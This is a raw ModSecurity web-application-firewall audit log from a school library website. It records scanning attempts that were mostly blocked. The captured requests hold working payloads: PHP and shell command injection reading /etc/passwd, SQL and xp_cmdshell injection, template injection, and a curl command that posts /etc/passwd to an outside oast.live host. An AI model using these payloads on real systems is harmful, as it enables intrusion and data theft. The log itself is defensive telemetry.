--8f29f305-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --8f29f305-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f29f305-E-- --8f29f305-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748310374392515 1814 (- - -) Stopwatch2: 1748310374392515 1814; combined=561, p1=364, p2=169, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f29f305-Z-- --a64b1c5e-A-- [27/May/2025:08:46:18 +0700] aDUZat6cNBpj1JOkpQlMbAAAAEk 103.236.140.4 51844 103.236.140.4 8181 --a64b1c5e-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162463843 --a64b1c5e-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --a64b1c5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a64b1c5e-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748310378099254 2603 (- - -) Stopwatch2: 1748310378099254 2603; combined=1426, p1=344, p2=1053, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a64b1c5e-Z-- --86e53a65-A-- [27/May/2025:08:46:18 +0700] aDUZahLFq2VRfSzm6b8PyAAAAJE 103.236.140.4 51860 103.236.140.4 8181 --86e53a65-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160760128 --86e53a65-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0q9cd1gpeook7mlf7sgaaixium4upehw.oast.live'-- --86e53a65-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e53a65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748310378115319 3488 (- - -) Stopwatch2: 1748310378115319 3488; combined=2330, p1=467, p2=1786, p3=23, p4=26, p5=27, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e53a65-Z-- --a0d9cc1c-A-- [27/May/2025:08:55:24 +0700] aDUbjFuSH_Spa4YU2ZmrDgAAAMw 103.236.140.4 52018 103.236.140.4 8181 --a0d9cc1c-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 209.38.248.17 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a0d9cc1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0d9cc1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748310924552553 829 (- - -) Stopwatch2: 1748310924552553 829; combined=338, p1=298, p2=0, p3=0, p4=0, p5=39, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0d9cc1c-Z-- --ad2cdd42-A-- [27/May/2025:09:08:43 +0700] aDUeq1uSH_Spa4YU2ZmrGQAAANc 103.236.140.4 52142 103.236.140.4 8181 --ad2cdd42-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168677378 --ad2cdd42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad2cdd42-E-- --ad2cdd42-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748311723114015 2708 (- - -) Stopwatch2: 1748311723114015 2708; combined=1438, p1=471, p2=933, p3=0, p4=0, p5=34, sr=139, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad2cdd42-Z-- --e7c7870d-A-- [27/May/2025:09:08:44 +0700] aDUerGTuEZUBy5rh0sZ85QAAABA 103.236.140.4 52156 103.236.140.4 8181 --e7c7870d-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163545884 --e7c7870d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e7c7870d-E-- --e7c7870d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748311724131050 2328 (- - -) Stopwatch2: 1748311724131050 2328; combined=904, p1=359, p2=518, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7c7870d-Z-- --6da35e51-A-- [27/May/2025:09:08:45 +0700] aDUerWTuEZUBy5rh0sZ85gAAAA4 103.236.140.4 52156 103.236.140.4 8181 --6da35e51-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_3_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 168392396 --6da35e51-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0q9cd1gpeook7mlf7sgxqx6hicpan9rb.oast.live) --6da35e51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6da35e51-E-- --6da35e51-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748311725113635 1633 (- - -) Stopwatch2: 1748311725113635 1633; combined=583, p1=350, p2=203, p3=0, p4=0, p5=30, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6da35e51-Z-- --d9818815-A-- [27/May/2025:09:15:48 +0700] aDUgVN6cNBpj1JOkpQlMsQAAAFU 103.236.140.4 52296 103.236.140.4 8181 --d9818815-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168392444 --d9818815-C-- --d9818815-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9818815-E-- --d9818815-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312148092911 3299 (- - -) Stopwatch2: 1748312148092911 3299; combined=1641, p1=399, p2=1220, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9818815-Z-- --2e34ea1a-A-- [27/May/2025:09:15:49 +0700] aDUgVd6cNBpj1JOkpQlMsgAAAE8 103.236.140.4 52300 103.236.140.4 8181 --2e34ea1a-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/13 Safari/608.2.11 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168677444 --2e34ea1a-C-- --2e34ea1a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e34ea1a-E-- --2e34ea1a-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748312149755689 2860 (- - -) Stopwatch2: 1748312149755689 2860; combined=1714, p1=343, p2=1334, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e34ea1a-Z-- --4964892f-A-- [27/May/2025:09:15:50 +0700] aDUgVt6cNBpj1JOkpQlMswAAAEc 103.236.140.4 52304 103.236.140.4 8181 --4964892f-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168392447 --4964892f-C-- --4964892f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4964892f-E-- --4964892f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748312150504501 16405 (- - -) Stopwatch2: 1748312150504501 16405; combined=26342, p1=519, p2=1651, p3=0, p4=0, p5=12102, sr=81, sw=0, l=0, gc=12070 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4964892f-Z-- --81d7c23c-A-- [27/May/2025:09:15:51 +0700] aDUgV96cNBpj1JOkpQlMtAAAAFQ 103.236.140.4 52308 103.236.140.4 8181 --81d7c23c-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Mobile/15E148 Safari/604.1 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168677447 --81d7c23c-C-- --81d7c23c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81d7c23c-E-- --81d7c23c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312151248837 3946 (- - -) Stopwatch2: 1748312151248837 3946; combined=2100, p1=487, p2=1579, p3=0, p4=0, p5=34, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81d7c23c-Z-- --845ea913-A-- [27/May/2025:09:25:15 +0700] aDUii1uSH_Spa4YU2ZmvwgAAAM8 103.236.140.4 46918 103.236.140.4 8181 --845ea913-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620527 --845ea913-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --845ea913-E-- --845ea913-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312715115209 2183 (- - -) Stopwatch2: 1748312715115209 2183; combined=946, p1=348, p2=566, p3=0, p4=0, p5=31, sr=59, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --845ea913-Z-- --93278b3a-A-- [27/May/2025:09:25:15 +0700] aDUii1uSH_Spa4YU2ZmvwwAAANI 103.236.140.4 46918 103.236.140.4 8181 --93278b3a-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 194 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 162464134 --93278b3a-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0q9cd1gpeook7mlf7sg3ds7qrjhe6qp5.oast.live) --93278b3a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93278b3a-E-- --93278b3a-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312715132923 1559 (- - -) Stopwatch2: 1748312715132923 1559; combined=460, p1=308, p2=135, p3=0, p4=0, p5=17, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93278b3a-Z-- --8cd96923-A-- [27/May/2025:09:25:15 +0700] aDUii2TuEZUBy5rh0saCAQAAAAI 103.236.140.4 46920 103.236.140.4 8181 --8cd96923-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 